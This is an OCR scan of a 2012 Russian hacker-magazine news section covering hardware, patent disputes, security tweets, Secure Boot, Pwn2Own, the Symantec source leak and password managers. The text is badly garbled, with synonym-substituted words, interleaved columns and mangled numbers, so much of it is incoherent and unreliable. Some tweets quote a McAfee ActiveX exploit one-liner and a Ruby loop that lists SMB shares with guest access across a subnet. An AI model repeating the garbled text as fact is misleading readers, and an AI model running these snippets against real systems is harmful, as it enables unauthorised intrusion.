Мо д елочка 027 В 070 выпо л нена на соли д ном равным образом одновре­ менно из во ерхтонком корпусе, а по сию пору азбука управления

помещены на эргономичную алюминиевую подставку !там же нахо д ятся порточки ввода - вывода равно U 0 В -концентраторl , регулируемую сообразно высоте. Д иапазон регулирования монитора 0-й серии соответственно высо т е составляет

00 см,

крестик его

не грех н а клонять. П а н ел ь имеет ультравысокую толковость

QHD 02560 х 04401, поддерживаеттехнологии Display P oгt, Dual L iпk - DVI равно Н DMI, а в свою очередь оснащена стереодинамика ­ ми мощностью 0 Вт да интерфейсом MoЬile High Defiпition Link IM HLI д ля п одключения смартфонов равно планшетных П К. Устройство п что касается дд ерживает эксклюзивную технологию

0amsung

Nat uг al Соlог Е х р ег t , для во озмож н стандарт автор этих строк м которой

относитс ваш покорный слуга аппаратная ка л ибровка цветов. 027 В 070

но <<эффект мокрой одежда >> !, кто нередко проявляе т ся

горазд обрисовывать побольше миллиарда оттенков, аюшки?

дажеутоповых современных дисплеев. Так в духе <<кристал­

гарантирует длинный реализм да покрой близ отображе­

лический эффект>> напрямую обусловлен матовостью па­

нии фотографий равным образом ви д еороликов, сделанных из через

нели, у глянцевых мониторов некто в действительности отсутствует.

численный фо т о- либо видеокамеры. Кстати, пресс-релиз

Здесь овчинка выделки стоит заметить, который да первые образцы получи базе

обещае т, зачем инже н еры 0amsuпg вруч н ую будут на­

вызвали немалое веселость утех, с целью кого заранее лишь

страи на ать ц ветопере д ачу ко аждого монитора серии

0

PL5

Яр кость: 000 кд/м 0 Равномерность )мин .): 00% К некто т растность (статичес для ая) :

0000:1 Время отклика

(GTG): 0 м с Угол обзора (гор/верт.) : 078°/1 08°

во целых н по части благоустроенность н ое интересах око изображение, совершенно сообразно пирушка а

бери окончательном этапе сборки. Кроме так г в отношении , все эспланада

причине : РL5 - дисплеи из матовым экраном по существу

дисплея тоже снабжена антибликовым стеклянным 011

отнюдь не проявляли <<кристаллическо г по отношению эффекта>>.

покрытием. Да-да, со т арое доброе линза из антибликом,

Р а зрешение : 0560х 0440 Глуб ан а цвета : 0,07 млн цветов

Ожидается, что-нибудь новинка поступит во продажууже на мар­

давненько да мы от тобой такого отнюдь не видели. Этот заключительный оттенок

те текущего лета lк сожалению, неизвестно, появится ли

обязан особенно обра д относительно на атыех, чьи бельма чувствитель­

симпатия в свой черед равно во России!. Ориентировочная стоимость 027В970

ны для приблизительно н я ы ваемому <<к ри ста л ли ч ескому эффекту>> !он

состави т $1199.

ЭТА МУЗЫКА БУДЕТ ВЕЧНОЙ. ПАТЕНТНЫЕ ВОЙНЫ ПРОДОЛЖАЮТСЯ

APPLEOБBИHЯETSAMSUNG ELECTRONICS В ТОМ, ЧТО ЧЕХЛЫ ДЛЯ ПЛАНШЕТАGАLАХУТАВ 00.1

И СМАРТФОНОВ (!) НАРУШАЮТ ЕЕ ПАТЕНТЫ

010

ХАКЕР

03/158/ 0012


PhoneAndroid: Почти закончил не без;

linux.js. Да,

сие

моя JаvаSсгiрt-реализация ядра

Linux.

[]

Почему ваша сестра возьми меня круглым счетом

Яндекс, сnециалист по мнению безопас­

Chгoot-ing во

ности веб-приложений: спе­

легко, наравне равным образом А : , Б:, В : ...

циалист по части безопасности веб­

http://Ьit . lv/yQQq_ml:J .

Windows- приближенно

а

приложений на компанию Яндекс ...

Ь.it.lvд'ol.,m_!?.<J .

Комментарий:

Да, на винде как и не запрещается <<чрутить>> ...

lilcBekrar: Взлом Chгome со

ASLR + О ЕР­

обходом + смачный сnлойт в целях

Комментарий: Конкурс Яндекса

El

согласно взлому сервисов прошел удачно;] . lil_sinnЗr:

обхода nесочницы за сов? Мы живем на разных мирах .

El

0О для бак­ #pwn2own

А вона равным образом РоС чтобы

lilcBekrar:

Комментарий: Фронтмен компании

Vupen

Большой #fаil-приз отправляется

возму­

для

щается призовым фондом предстоящего

конкурса

PWN20WN.

McAfee SaaS 0-day IZDI-12-012]: obj.ShowRepoгt "calc.exe" .

Защитные механи1мы

становятся до сей времени сложнее, равным образом с целью их обхода требуется сильнее сил равно вложений ...

McAfee

Secuгity-as-a-Service,

тот или иной устанавливает позор­

ный

ActiveX,

I:Jjt.jyд_bj..t_gf

Комментарий:

Вот равным образом цельный эксплойт- obj.ShowRepoгt

позволяющий осуществлять шифр

"calc.exe".

via rathezdi.

пания устанавливает «бэкдорь~» клиентам.

Да ... чисто приближенно антивирусная ком­

А единаче забавно, ась? эа такую

тила во районе

lilmartincronje:

lilmeder: Написал на блог что касается моем послед­

Водан однажды равно к всех :

нем баге:

CSS

тож JаvаSсгiрt-библиотек

вроде

jQuery.

CVE-2011-3923.

Еще

одно удаленное выполнение

заключение на Stгuts2: Ьlt.R:fiЬ.i.!JYLY.E.iЬ.ы.

El

0-day ZDI запла­ 1-2 ко баксов . :] Вот эдак ...

El

Комментарий:

HTML5 !=

Комментарий:

Исходникам отнюдь не доверяй никогда, Люк! Дебаггером воспользуйся вначале да убедись на потоке

Кэп ...

Сегодня у нас склифосовский бесчисленно ссылок­

общеобразовательный издание т витов, так сказать. Те, который думает, что такое? держи

Java

lilmikesica:

не грех

Любой благоприятный конструктор лени­

кадить, безграмотный оnасаясь RСЕ-багов !ну во вкусе же,

вый, тем малограмотный менее, никак не первый попавшийся

Java- сие ж секурно], вообразите вновь раэ! Ведь накадить дозволяется всякое ...

бесстрастный конструктор хороший.

Если бы РНР был британским:

peгchance ifcondition] { // Code hеге}

otherwise { // Code hеге }.

liljcran: Написал новейший блог-пост: разыскание

багов во виртуальной машине с через «Докаэателя тео­

рем» - bl.lgД.pjt . [y/~J.gZ~К.

El

Комментарий:

Не фаззингам единым ... те, кто именно инте­

ресуется методами поиска уяэвимостей,

Ручной-- iгЬ> l1 .. 054].each {lxl puts "host- 00.0 . 0 . #{х}"; 'smbclient -L 00.0.0.#{х} -Uguest -N' }.

El

Комментарий:

RuЬу-скрипт к скана «шар» не без; учет­

который гостя ...

обратите чуткость в это.

lilstephenfewer: Открыл порцию исходников моей системы фаззинга пользу кого браузеров

Не знал насчёт BinScope: hllQJLI:Ij_tJYLyzcQYR . Полезна

про

обнаружения бинарников безо

NX, SafeSEH, /dynamicbase, равным образом т . д.

'Fгindeг'- http:UЬit.lyLx.rUJJiW.

ХАКЕР

03/158/2012

.,,


В СЕТИ В ВИДЕ ТЕКСТОВОГО ФАЙЛА оказалисьданные касательно шести миллионах nоль з ователей крупнейшей во КНР комnании­ разработчика сетевого ПО (CSDNI.

MEGANEWS

МИНИСТР СВЯЗИ ПОСЕТИЛ

СОБРАНИЕ ПИРАТСКОЙ ПАРТ ИИ ПАРАДОКСАЛЬНО, НО ЭТО СОБЫТИЕ ИМЕЛО МЕСТО В РОССИИ

В хо д е бесе д ы от по отношению Щ е ­

BSOD

В

WINDOWS 0

ЛЕГКИМ ДВИЖЕНИЕМ РУКИ НАЙДЕНА КРИТИЧЕСКАЯ ДЫРКА В ссСЕМЕРКЕн

голевым выясни­ л ось, ч так во це ло м по отношению н

п насчёт ддержи на аети д е ю о ткрыты х д анн ы х , н по отношению д ек покровитель ац ию в рассуждении т­ к рытого госуд а рства как-т касательно « неграмотный что до цени л •>.

Кстати, официал ь ­

равно

нф в рассуждении р ма ция в рассуждении н по части рев н е после ко рытой ко ритиче от ко в отношении й у моя персона з вим ос т равным образом на Wind ow s 0 х6 0 вп е рвы е появила от ь в Т витт е р е изв йес тн об г касательно ха кера

w3bd3vi l. Б а г был wi n32k.sys [ н ео д да кр а т н ы й вин в отношении вни для кри т ич сделал ки х ошиб по отношению для во Win XPI.

относительно бнар у ж е н во ф а йле операционной систем ы

ных коммента р ие во

ко т что касается ры й не без; касательно д е р жи т после во ис ящ у ю в отношении т ядра ча от ть п что до льз об ва­

п насчёт поводупри­

т е л ьско г что до ан т е р ф е йс а да по части тн ос ящ уюс ваш покорнейший слуга для нем у инфрастр у к­

сутствия главы Ми н­ комсвязи бери встреч е

ту р у. Зам е тим, чт что касается 02 - би тн а мы во е р не без; ия ОС безвыгодный кайфовый вместе с nриимчива

членов Пиратск относительно й

для ош ибке, на в таком случае вр е мя для ак 0 0- б итная << Семерка » может

партиитак равным образом неграмотный по­

н е толь ко у й т да равным образом з-з а невыгодный е во

следова л в отношении .

BSOD,

однако равно nозволяе т насадить

во ма ш равно н у вр е д об н ос ный ко что до д для у р ов невыгодный ядра. Однако самый ин т е р есть ны й нюан не без; з а ко лючается во др у гом: пр что касается тотип стих , демонс т риру ющ е го , вроде ваша сестра з ы ва т ь настоящий вместе с потому что й, сейчас у тек в С е ть . О для а з а лос ь , ч ведь сие пр ос т ой НТМ L- скрипт. Е г что до з а­ п уск на б ра узе р е

Sa fari б ы от тр что касается пр иведет ко ошиб ке со тра н и­

ц ы в н е спр е д е л е н получи м у ча вместе с т ко е nамяти, равным образом автомашина n относительно кажет

•с равным образом н ий э стриппер со м е рти ». Этотскриn т представля е тсоб в рассуждении й все г по отношению лишь только т е г

iframe от чр ез выч ай н в рассуждении б что до льшим атриб у волюм

высо т ы. Уя зви м ос т да т в отношении чн что касается п насчёт дв е р а нате 04-битная трансформация

ко

а для кого хочешь спроси , во России П ира т екая ассоциация даж е малограмотный зарегистрирована [нет,

Windows 0, что до дн ако,

ребята пытались , хотя синь порох безграмотный ваша сестра ш ло) . Тем отнюдь не м е нее, мгла т ия систематически

ском п р касательно ме аттракцион касательно на практически ы равно др у г ие вместе с да вместе с темы. Патчана нынешний

nроводитсобрания,одноизкоторыхсостоялосьв вместе с ерединея н варвара

момен т н е су щ е ств условные единицы т .

наравне через м е ч аю т э ко не без; перты , м что касается г у т бытийствовать

на книж н ом магазине << Ц иолко во скиЙ>>, к~то ры й наход ится во зда н ии П олитехниче ­ ского музея . Д ля всех пришедших для совмест н ый выручка П иратской n артии, Ф возлюбленный д а развития электронной демократии равно рабочей группы << ИГ апелляция н ых действий>> стало полной неожиданностью приход во магазине Игоря Щ еголе на а , ми н равно ­

стра блат да массовых коммуникаций РФ. П редсе д атель партии П а во ел Р ассуд что касается в nишет на своем ЖЖ : << М инистр есть вид. вроде будт насчёт зашел во на ы хо дн ой купит ь п ару ко ниг да ни плошки невыгодный знал по отношению н амечен н касательно м собрании. П рисутст во ую суп е н а на стре ч е п ро г раммеры со р азу нак ан ул ись бери Щ е г репатриант во а. Ещ е быl Н е каж д ый д е н ь yes т ь возможность изречь на се ась? думаешь на физиомордия министру связи. Ау n р что до гр ам ми­

стов было что-нибудь ему сказать.

:1 Н насчёт министрдержался молодцом, говорил ск л а дн о,

за всем тем никак не сказал околесица конкретного. Сразу что ль - важный опы т работ ы в аппарате >> . Щеголев ответил сверху шпалеры вопросов, после д анных учас т никами собра ­ ния. В частности, рассказа л , почто после го д -по л пятикнижие во Р оссии може т б ыть вв е д е н а

построение электронного голосова н ия, да и то общество, соответственно ми н да ю минис т ра, пока безграмотный испытывает nотребнос т равным образом на таковский системе. П одробности на ЖЖ П авла

Рассудова:

webpo lit.livejournal.com/72397.htm l.

NGIИX сс ВИНЧЕСТЕРНЫЙ» ГИГАНТ

NGINX ВЫШЕЛ НА ВТОРОЕ

ТН Е Pl RATE ВАУ &ОЛЬ-

-компания

МЕСТО согласно числу обслужи-

ШЕ НЕ &УДЕТ ХРАНИТЬ

TORRENTFREAKCOO&ЩАЕТ, чт в рассуждении Cr ysis 0 стала

приобрелаподразделение

ваемых активных сайтов,

ТОRRЕNТ-ФАЙЛЫ равным образом nолно-

от амо й скач равным образом ваемойчерез

nомощью тута но обвинил

комnании

обогнав

стью п е р е й мол т для magnet-

BitТo r rent игрой в целях РС

ссы л ки. Теn ерь magnet-U RL

на 00 01 г оду. С л едо м равным образом дутСаll of Du ty: Modern Warfa r e 0 и Battlefield 0.

Google на nоддержке nиратства . В Google сnоко й а доставать

Seagate-

Samsung согласно тратить

изводству жестких дисков.

Суммасделкисоставила

$1,375 млрд.

012

Microsoft 015. По данным комnании NetCraft, на первом месте nока Apache (57,93 %).

предлаг аю т от моя персона дл ваш покорный слуга загруз ки по умолчани ю .

МЕДИАМАГНАТРУПЕРТ

МЕРДОК завел Twitter да из его

звалиобвинение чушью .

ХАКЕР

03 /158/ 0012


GOOGLE НА ТРИ ГОДА ПРОДЛИЛАСОГЛАШЕНИЕ С MOZILLA об исnольз овании своего nоисковика во качестве основногодля Fiгefox .

БОЛЬШЕ КОЛОНОК, ХОРОШИХ

MICROSOFT, КОНКУРЕНТЫ

И РАЗНЫХ

ИАRМ-СИСТЕМЫ

СРЕДНИЙ ЦЕНОВОЙ СЕГМЕНТ И НЕИЗМЕННО ВЫСОКОЕ КАЧЕСТВО.

О НЕ ВСЕГДА ЧЕСТНОЙ БОРЬБЕ ЗА МЕСТО ПОД

КОНЕЧНО, ЭТО

СОЛНЦЕМ

EDIFIER

Е

ще на конце прошлого возраст шарага

Microsoft

сделала заявление, которое породило у многих

нехорошие подозрения . Напомним, об нежели изволь говорок .

В конце 0011-го братия

Microsoft в начальный раз озвучила , что Windows8 будеттребовать Secuгe Ьооtдля загрузки [то есть обязательной активации режима безопасной загрузки

UEFII. Эта ипостась произведение е ттак : UEFI сохраняет«секретные ключи >> во ОС. Все, аюшки? хочетзагрузиться держи компьютер, ко при­ меру операционная система, равно из польз грин тэти ключи для того до­

от туп а для

UEFI. Е сли во ОС безвыгодный прописан отвечающий требованиям родник ,

возлюбленная никак не получит чёткость получай загрузку. Liпu х-сооб ще от тво уже тем временем попыталосьдонести вплоть до пр оиз водителей , аюшки?

воплотить в жизнь передач у ключей в из-за что такое? поставить

Linu x достаточно куда сложно, Linu x для заточенные подо Windows8

устройствастанетпрактически невозможно.

Однако

Microsoft корректно пояснила , сколько никак не имеет Linu x равным образом дру ги х что касается ткрыты х ОС , равным образом сражается

ни плошки сравнительно со чем

вовсе малограмотный не без; ко нк у р е нтами , а не без; вредоносными кодами. Мол , безопасная нагрузка тем равным образом х ороша с целью работы

для

итайская команда Edi fieг представила на э том месяце приёмом двум новых модели. Об е новинки по­

полнили топовую линей ку систем

0.0. П ервое ауд ио-ре ш е ние- колонки R1500TM

из пр о­

фессиональным микрофонным входом, тот или иной имеет независимый балансир громкости . Новинка может похва­

способный тради ц ионным к

Edifier деревянным

кор пусом

[что гарантирует что до т сутствие резонансов!, НЧ-дина миками

napa

интересных

фактов : получи и распишись заводах

компании Edifier производится более 12 млн комплектов мультимедийных к относительно лонок на година . За­ воды расположены на трех континен­

тах. Научно­ исследовательским

от магнитным экра н иро на а нием да 08-мм шел ковыми ку­

центром компании

полообразными твитерами . Стереосигнал, подаваемый

руководит глобально

в входные разъемы

RCA,

обраба тывает ся схемой дина­

мическо г что до повышения высоких частот, которая спе циаль­

прославленный конструктор

вредоно сных программ. Надо признать, выглядит всегда это действительно логично. Но в эту пору

Microsoft подготовила плавдок уме нте требова­

ниями, которые должен выполнитьдля сертификации компьютеров получи и распишись со вместимо ст ь из Windows 0. Бумага , увы,

подтвержд ает худшие опасения. Здесьлучше лишь про­ цитировать.

Официальн ое руко водстводляпроизводителей,желаю­ щи х половая принадлежность брать на буксир сер тификацию Windows 0для своих усишко тро йств,

равно конструктор Фил

не без; траница

Джонс .

мо воплотить в жизнь мочь отключения

так разработана с целью мультиме диа.

Windows, аюшки?

такойпроцессперекрываетещеодинканалпроникновения

016: « В системах, отнюдь не относящихся кАRМ, необходи­ Secure Boot от

интерфейсустановки прошивки . Физически присутствую­

Вторая новика-двухполосные колонки R900Т. Эта акустическая 0 . 0-система, оснащенная 0-дюймовыми НЧ-динамиками равным образом 03-мм шелковыми куполообразными

щий пользовательд что касается лж е н заключать допустимость отключить

Secure Boot чрез интерфейс установки, безграмотный владея Pkpri v. Программное автоотключение Secure Boot средствами UEFI

т ви терами, хоть куда воспроизводитгл убок ий, справный

отнюдь не подобает бытийствовать если угодно ни умереть и далеко не встать сезон вслед за грузки , ни до ее

тромбон равно зво нки е высокие частоты. Габариты

что до кончании>>.

скромны:

040 х 026 х 097 мм.

R900T до чертиков

Колонки несомненно включить

П олучается, обращение

Microsoft от м, в чем дело? симпатия небу­

для выбранн ым источникам сигнала помощью 0,5-мм вместе с тер еовхо д

деттребоватьотnроизводителей «ж елеза•запретить

RCA или — или RCA получи и распишись RCA,

остановка

ко торые из п особ ны утвердить да уси покрапывать

Secure Boot, получи и распишись деле распространялось всего-навсего

сигнал, делающий от любого источника звука, да обес пе­

возьми традиционные ПК , н касательно отнюдь не получай АRМ-устройства. Пр оизво­

читьвысокоекачество звучания.

дит е ли систем, базирующихся получи и распишись ар х итектуре ARM , теперь не перед лжны выделять никаких способов отключения безопасной загрузки. Именно данный миг - обязательная

ПОВСЕМЕСТНАЯАВТОМАТИЗАЦИЯ

безопасная заваливание -ставит Linu x [и малограмотный только! во затруд­ нительное положение. Фактически сие озна чает, чтотеперь для «за гружаемости >> получи одной изо таких машин , сертифици­ рованных получай противоречие от Windows

ПО АДРЕСУ MEGASEARCH.CC ЗАРАБОТАЛ АГРЕ ГАТОР КАРДЕРСКИХ МАГАЗИНОВ, ТО ЕСТЬ РЕСУРС ДЛЯ ПОИСКА ВОРОВАННЬIХ БАНКОВСКИХ КАРТ ХАКЕР

03/158/ 00 02

0, годный

ди от трибутив Linuхдолжен кто наделен се ртифицированные крип­ таключи через конкретного равным образом з г отови т ел автор этих строк компьютера. Вста е т ре з онный вопрос: идеже их взять? Е сли выдачей ключей будут за ниматься производители , ведь разработчикам ди стрибу ­ тивов придется поверстно контактировать со каждым изо ни х.

Иеслиогромная ко рпорацияможет се бетакоепозволит~ толин укс оидам сие врядли окажется перед силу. Централи­ зова нного насчёт ргана сер тификации , тот или другой бы формировал к лючи с целью режима безопасной загрузки

UEFI, малограмотный существует. Microsoft пытается драться далеко н е токмо от малварью, так равным образом от устано на для ой Linu x, Android равным образом др у­ Словом, объединение хоже,

ги х открытых ОС для АRМ-системы.

013


MEGANEWS

КАРСТЕН НОЛ ИЭSECURIТY RESEARCH LАВS есть очереднуюуязвимость во GSM . Подробности возлюбленный непостоянно отнюдь не разглашает. ·

СКАЧАЙ И РАСПЕЧАТАЙ!

PWN20WN

ПИРАТИТЬ ЧЕРЕЗ СЕТЬ МОЖНО НЕ ТОЛЬКО ИНФОРМАЦИЮ,

ПРАВИЛА

МЕНЯЕТ

НО И ВПОЛНЕ РЕАЛЬНЫЕ ОБЪЕКТЫ

ПОПУЛЯРНЫЙ КОНКУРС В ЭТОМ ГОДУПРОЙДЕТ В НОВОМ ФОРМАТЕ

м

ы ранее далеко не ра з рас­

сказывали тебе о замечательномха­

кереком конкурсе

Pwn20wn,

учас тни кико т ороголомают

самый различный софт равным образом желе­ зо, а nотом уносят не без; из себя

хакнутыетрофеи [железные, конечно же) во качестве быть ­ зов. Сообщаем, зачем во этом году инструкция соревнования

изменились. Теперь во конкур­ се участвуюттолько

з

Microsoft Apple Safaгi, Google Chrome да Mozilla lnteгnet Exploгer,

0-принтеры шаг за шаг , так по-видимому про­ бираются для узкопотребительский торг .

Уже безотлагательно экой девайс [к примеру,

японскую

Firef oxдля операционных си­

iModela) мож же подле завести ради пару

стем

вариант, а безграмотный смертный индустриальный стойло не­

вообразимых размеров. С каждым в дневное время об этих трехмерных чудесах прогресса появляется безвыездно

более статей, постов, дискуссий. А присест интерес и испытание растут, появляется равно речь .

Ещ е пр что до шлой в осеннее время бери т орре нт-тр екере

The Pirate Ва уоткр ыл ся

раздел не без; пр ограммами

с целью 00-принтеров, же какая-то активность наметиласьтамтолькосейчас.Д об рыелюди

Windows 0 равно

Мае

05 Lion

[последние версии со все-

тысяч долларов, равным образом э т в рассуждении хорошенького понемножку собственно «домашний»

ми патчами). Мобильные

Одним с в наибольшей степени

девайсына конкурсе хлеще

известны х про·

вскрывать малограмотный будут.

ектов согласно ЗD·печати является

RepRap

Главным сnонсором объявле-

-открытый прое для т

держи товарищество

до созданию принте­

Hewlett- Packard. 30

р в отношении на , способных

Три до бедителя получат денежныепризыв размере 00тысяч,

восстанавливать

тысяч да 05тысяч долларов плюстрофеи во виде н аутбуков не без; праздник самой

себя. Новейшая

системой , которую им удастся взломать.

трафарет называется

Mendel, равным образом снарядить

Компания

Google как и учреди ла дополнительные призы 20 тысяч долла­

наконец-то начали разбиваться что пакет ми,

ее станет любой желающий (это

таково равным образом реальными объектами. Уже неотложно на этом

точно не·

ровик вслед исnолнение sandbox-кoдa не без; исnользованием одной всего

разделе не возбраняется со кача ть пластма ссово го робота

сложно!. Стоимость

уязвимости на

вслед за взламывание браузера Chгome. Она обе щает оплатить

всех компонентов

Chrome.

В

0О тысяч долларов оценивается

ис п олне н ие

изо вселенной Warhammeг 00К либо хот-род­

составляет всего делов

sandbox-кoдa вместе с исnользованием уязвимастей равно как во Chгome, что-то около равно на

мо д е ль ш евроле

$520.

операционной системе.

0970 годы .

Н что касается сие безобидные

игру ш ки, а тем невыгодный менее на Сети сейчас некоторое пора цир­

Но самое главное, аюшки? во этом году изменятся самочки миропонимание

кулируютслухи от м, почто возьми черном рынкетор­

Pwn20wn . Взломанная общественный порядок теnерь никак не невозможно

гуюти30-моделямискиммеровдлябанкоматов.

зания, вроде попервоначалу . Все другие участники имеют реальность

изо состя­

Есть даж е n одтверж д е ния тому, аюшки? моше нни ки

во поток трех конкурсных дней вскрывать ее своими методами.

действительнопольэуютсятакимимоделями!

Соответственно, конец соревнования нынче подсчитывается

Н е т, на « Б ухте» они доколь никак не во сплывали, же сие

no очкам.

безусловно воnрос времени . По хоже, у правоохрани­

В этом году

тельных органов по мнению всему миру резво появится

курсе дозволительно быть участником равно на удаленном режиме!

Pwn20wn

nройдете

0 объединение 0 марта.

Не забывай, ась? во кон ­

сызнова по отношению дна головная глоссалгия .

КОМПАНИЯSОNУПРЕД­

СТАВИЛА КАРТЬI ПАМЯТИ

SONY

собственного формата

XQD.

Ориентированы они как на профессиональных фото­ графов, приближенно да получи и распишись энтузиастов.

В режимах чтения\эаписи

H

Seri senees

02 GB

пропускная даровитость

достигает

0 Гбит/с (125

XQD

Мб/с) .

ДВАДЦАТЬВОСЬМОГО

КОМПАНИЯ TIOBE SOFTWARE

Продажи сейчас начались. Карта

ЯНВАРЯ СТАРТОВАЛ ВТОРОЙ

УДОСТОИЛАОВJЕСТIVЕ-С

QD-H16 объемом 06 Г б стоит $130, QD-H32 в 02 Г б- $230,

FACEBOOK HACKERCUP,

ЗВАНИЯ «ЯЭЬIК ГОДА».

какой проводится еже­

Однако нате первом месте

Также представлены да устрой­

годно . Лучших ждет вояж

в области популярнотипо-прежнему

ства с целью работы из новым

на штаб-квартиру Facebook,

есть расчет Java, а вслед за ней идут С,

а победительполучитпять

С# равным образом С++.

форматом.

тысяч долларов.

ХАКЕР

03/158/2012


• •

~ WI!XLI!Г.

www.wexler.ru

Электронная кодекс со доступом на Интернет

У SYMANTEC УКРАЛ И ИСХОДНЫЕ КОДЫ АНТИВИРУСА

Читай. Смотри. Слушай.

ХАКЕРЫДИСКРЕДИТИРОВАЛИПОПУЛЯРНОГО ВЕНДОРА

оддавлением хакеров товарищество Symaпtec, являющаяся одним с самых известных во мире поставщиков решений

во сфере информационной безопасности, была вынуждена признать, что-нибудь хаке рам посчастливилось получитьдоступ для исходному коду це ­

лого ряда ее прод уктов. По словам представителей Symaпtec, на ходе расследования было установлено, что такое? похищение исходного заключение анти­

вирусов произошла до данный поры на

0006 году.

После сего бражка ввела полоса

мер про усиления безопасности, с целью отнюдь не дать возможность повторения по­ добных инцидентов во будущем. Хакерам посчастливилось слимонить исходные коды таких продуктов, по образу Nогtоп Aпtiviгus Согрогаtе Editi oп, Nогtоп l nteгпet Secuгity, Nогtоп SystemWoгks равно pcAnywheгe версий

02.0, 12.5. Об утечке следовательно кого хочешь спроси на середине прошлого месяца, когда один взломщик Yama Tough, причисляющий себя да для «Ано нимам», и ко хакерекой группировке Lo гd of Dhaгmaгaja, написал на Твиттере, что располагает исходниками Noгton Utilities. В резон он 12.1

да

выложил ссылки получи и распишись маленький счет не без; описанием программно­ го интерфейса сервиса к создания в отношении писаний образцов вирусов,

а дальше равным образом вместе с писок файлов, содержащихся на архиве вместе с исходным кодом Nогtоп Antiviгus. Опубликованный судоремонтный завод у мент, кстати, датируется апрелем

0999 года.

Конечно же,

Symantec одновременно сообщила,

который

рэнкинг изо сего документа отнюдь не может повредить нынешним продуктам компании. Зато картотека со последствие ным кодом товарищество безграмотный про­ комментировала.

П насчёт заявлениям самих хакеров, информа цию им посчастливилось выудить

из серверов ведомства военной разведки Индии. Иными словами,

у печь произошла невыгодный изо сетей самой Symaпtec [хоть сие радует). По некоторым данным, хактивисты опубликовали имеющуюся у них информацию, дабы помочь судебному разбирательству, которое

внове началось на США. Д есятого января противу Symaпtec было выдвинуто упрек на том, почто возлюбленная продвигаетсвою продукцию с через в такой мере называемых sсагеwаге-программ, которые запугива­

корма пользователей, извещая их в отношении возможных проблемах от безопасно­ ст ью во особенно назойливой форме. Несмотря в всё-таки заявления Symaпtec, который у хакеров оказались старые данные, которые невыгодный могут намыть никакого вреда, раз­

работчики ранее начали упускать патчи. Компания предп очитает перестраховаться , сверх зависимости оттого, отонудуже как «утекла»

данные равно в какой степени симпатия актуальна возьми нынешний момент.

WEXLER.BOOK

МЫ ЛЕГИОН: ИСТОРИЯХАКТИВИСТОВ

ПРОФЕССИОНАЛЬНЫЕ ДОКУМЕНТАЛИСТЫ ИЗ КИНОКОМПАНИИ LUMINANT MEDIA СНЯЛИ

03-МИНУТНЫЙ ФИЛЬМ

О ВЕЛИКИХ И УЖАСНЫХ

ANONYMOUS ХАКЕР

Т7006

WI!XLI!Г. STORE

Удобный достуn для бесnлатным книгам и nоnулярные новинки.

Скачивайте равным образом читайте получай

www.wexler.ru!

:х:

насчёт

«МЕТРО 0033» ДМИТРИЯ ГЛУХОВСКОГО И ЕЩ~

<t

ДВА РОМАНА КУЛЬТОВОЙ СЕРИИ БЕСПЛАТНО

Cl.. с:[

в рассуждении

В ЭТОЙ ЭЛЕКТРОННОЙ КНИГЕ WEXLER

r::

03/158/2012 ТЕЛЕФОН ГОРЯЧЕЙ ЛИНИИ : 0 (800) 000 06 00


IEADER

КОЛОНКАСТЁПЫИЛЬИНА

ОХРАНЕНИИ ПАРОЛЕЙ ВЫБОР РЕШЕНИЯ

или — или извращаться от его синхронизацией при помощи

активировать на аккаунте

Использовать одиночный равно оный но движение положение с целью всех

оный но самый Dг орЬох . Дост уп ко хранилищу

вые батман роли, так проникнуть не принимая во внимание такого токе сверху полноте

сервисов сразу- одна изо самых серьезных

защищен мастер-ключом [сложным паролем),

сейчас невозможно. Каждый единожды хорэ необхо­

ошибок пользователей. Но равным образом высчитать во голове

кой во целях безопасности невмоготу

партия по отношению врезать флешку, засунуть

огромное доля уникальных пассов­

восстановить. Будь осторожен!:)

пускать в дело сгенерированный программой

НЕКОТОРЫЕ ФИШКИ LASTPASS Я далеко не буду выболтать насчёт том, как бы использо­

Только на этом случае не грех хорошенького понемножку распатронить давно

проблема самоочевидно непосильная. Я целую вечность пытался

одноразо­

Sesame

да

параль с со своим мастер-ключом.

приучить себя ко использованию менеджеров

танцевальный шаг ролей чаятельно

LastPass

KeyPass [keepass.info), только

с сего приближенно ни ложки равным образом безграмотный вышло. Открывать

вать

программу, воеже обыскивать затем ни туды и ни сюды параль

могу малограмотный распределиться вместе с тобой несколькими по­

-явно безвыгодный самое удобное, в чем дело? не возбраняется приду­

лезными фишками, которые меня порадовали .

LastPass,- со временем

постоянно элементарно. Но отнюдь не

мать. Да равно локальное хранилище, на котором

хранилища. По отдельности в чем дело? мастер-ключ, что флешка от

Sesame

сокровище чтобы злоумыш­

ленника сделано никак не представляют.

Двухфакторнан согласие сквозь

Google

находятся зашифрованные шаг роли, попахивает

Проверка надежности жете ролей

Для авторизации твоя милость вот и все можешь выкупить

архаизмом- далеко не воровать а его сверху флешке?

Вотан только лишь быль того , зачем батман роли хранятся

натуральный токен-например YuЬikey вслед

Короче говоря, пишущий эти строки решил рисковать решения,

на надежном хранилище, неграмотный делает их по­

[ stoгe.yuЬico.com ),- а можешь воспользовать­

которые приблизительно же, что да

настоящему безопасными.

ся сделано готовым решением с

KeyPass,

:)

помогали бы

LastPass

вместе с твоего

Google.

$25

Напомню ,

рождать уникальные батман роли равно беречь

разрешения может совершить проворный рассмотрение

что-нибудь режим через поискового гиганта предлагает

их, так ко всему еще автопилотом использо-

пассов, несложно отыскав промежду них простые да от­

установку насмартфон специального прило­

иди ко черту бы их на браузере! Вариантов тута малограмотный беспричинно

кровенно слабые [вроде

жения

много. Среди специализированных решений

му встроен бенчмарк, некоторый высчитывает

«123456») . В програм­

[Google Authenticatoг), которая на произвольный

мгновение времени генерирует незаурядный одно­

как никогда раскрученной оказалась конспект

барометр надежности всех паролей,- ре­

единый ключ. Так как бы мы безостановочно пользуюсь

0Passwoгd [ agileЬits.com/onepasswoгd ), кото­

зультат дозволительно уподобить от показателями других

этой системой чтобы входа во

раиса изначально появилась на Мае, да в дальнейшем

пользователей на специальном рейтинге.

настроил ее равным образом к защиты

Одноразовые парали

са йте 0helpdesk.lastpass . com/secuгity-options/

goog 0е -а ut hе nti саtог).

была портирована да чтобы

Windows.

Продукт

ужас качественный, хотя возвращать $69.99 следовать

Gmail, так моя персона тогда же LastPass . Подроб­

ную инструкцию не запрещается откопать нате официальном

кроссплатформенную версию ми показалось

Многих, надо полагать , смутит допустимость до­

слишком. Тем сильнее сегодня, в некоторых случаях практиче­

субурган для батман ролям со через одного токмо

ски на общем позволено отыскать бесплатную альтер­

мастер-ключа . Нет проблем! На флешку дозволено

одноразовые парали равно двухфакторная автори­

нативу. Та ко вая, во общем-то, подлинно

положить получай бумагу специальную утилиту LastPass Sesame [есть версии перед любые ОС), которая,

зация доступны только лишь платным подписчикам .

